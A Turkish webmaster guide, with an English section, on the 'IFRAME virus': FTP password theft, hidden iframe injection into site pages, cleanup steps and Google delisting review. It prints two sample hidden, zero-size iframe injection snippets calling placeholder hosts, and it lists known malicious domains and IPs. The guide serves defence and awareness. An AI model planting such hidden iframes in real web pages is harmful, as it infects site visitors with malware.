Bir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında biraz yardımcı olalım. Bilinçsiz bir çok kullanıcı bu virüsten kolaylıkla etkileniyor. Genellikle de bu virüsü fark edip şikayetçi olanların çoğunluğu amatör web tasarımcılar. Malesef ki güvenlik konusunda az tecrübeleri ve aşırı öğrenme hırsları, ücretli yazılımları crackli kullanma nedenleriyle bu virüsle tanışıyorlar...
IFRAME Virüsü nedir?
Virüslü bilgisayarlardan siteye FTP ile giriş yapan bilgisayarlarda ftp girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır. Genellikle index,default,main isimli dosyalara bazı dosyalarında başına base64 olarak kod eklemektedir ve .js dosyalara bulaşmaktadır
Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.Kullandığınız Proxy serverlara dikkat edin. Proxy veren yerlerin birçoğu bu hizmet üstünde ftp ve diğer bilgilerinizide almaktadır. Yasak sitelere girmek için Proxy kullandığınızda verilerinizin çalınmasınada davetiye çıkartıyorsunuz ve sitenize virüs bulaşmasına..
Nasıl bulaşır :
- Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
- Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.
IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.
IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.
IFRAME kod örnekleri:
<IFRAME src=´http://siteadresi/index.php´ style=´border:0px solid gray;´ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>
echo "<IFRAME src="http://siteadresi123" width=1 height=1 style="visibility:hidden;position:absolute"></IFRAME>";
Korunmak için yapmanız gerekenler:
- Ftp erişimi olan kullanıcılarınızı belirleyin
- FTP şifrenizi değiştiriniz.
- Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
- FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
- IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.
Sitelerinizi kontrol ediniz:
Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.
Zararlı kod bulaşmış dosyalarınızı temizleyiniz.
IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.
Siteniz Google´da saldırgan site olarak listeleniyorsa:
IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:
- http://www.google.com/webmasters/tools/ adresine giriş yapınız.
- Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
- Sitenizi ekleyerek doğrulayınız.
- Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
- Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …
- Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
- Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !
IFRAME Virüsü hakkında bilgi için:
http://www.google.com.tr/search?sourceid=navclient&aq=8&oq=IFRAME+&hl=tr&ie=UTF-8&rlz=1T4GGLL_trTR333TR333&q=IFRAME+vir%c3%bcs%c3%bc
Bilinen IFRAME virüsü yayan alan adlarından bazıları:
| * coolnameshop.cn * chura.pl * jl.chura. pl * medical-static-center.ru * lotultimatebet .cn * lotmachinesguide .cn * cheapslotplay .cn * lotultimatebet .cn * cutlot .cn * mediahousenameshopfilm .cn * betbigwager .cn * namebuypicture .cn * thelotbet .cn * hotslotpot .cn |
* superbetfair .cn * litecartop .cn * betworldwager .cn * litecarfinestsite .cn * homenameregistration .cn * litegreatestdirect .cn * playbetwager .cn * nameashop .cn * mainnameshop .cn * superlitecarbest .cn * internetnamestore .cn * dotcomnameshop .cn * mediahomenamemartvideo .cn * mixante .cn |
English Documentary
IFRAME Virus
There are different variants of badware/malware that infect websites. Most of them use iframe HTML code, they cause damage by injecting iframe tags into your website and that´s why they are called iframe virus. Code may be injected into HTML, PHP, ASP or tpl source files. They may infect through various themes or templates of Content management systems. The virus will also modify .htaccess and hosts files, and create images.php files in directories named ´images´. The infection is not a server-wide exploit. It will only infect sites on the server that it has passwords to.
This recent surge in compromised web servers has generated many interesting discussions in online forums and blogs. Web malware infections hurt businesses Google, Firefox, Internet Explorer, and anti-virus companies blacklist infected sites. Businesses lose thousands of dollars in revenue. Sites suffer damage to their brand and reputation.
Iframe virus is a type of badware. "Badware producers are constantly developing new, creative ways to install badware onto your computer". Badware distribution has been expanded beyond traditional channels like email viruses to harder-to-avoid methods like automated “drive-by downloads” that are launched by compromised web pages.
There are typical hidden iframe tags injected at the bottom of webpages. The domain names may vary but they typically end with .cn, .ru, ro, etc. The domain names usually contain words shop, cool, lot, bet, etc.. Most of these domain names point to IP addresses like 94 .247 .3 .151, 94 .247 .3 .150, etc. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number. In recent times, we have found iframe code with domain patterns like 3b4 .ru/, q3e .in/, x3y .ru/, using port 8080 .
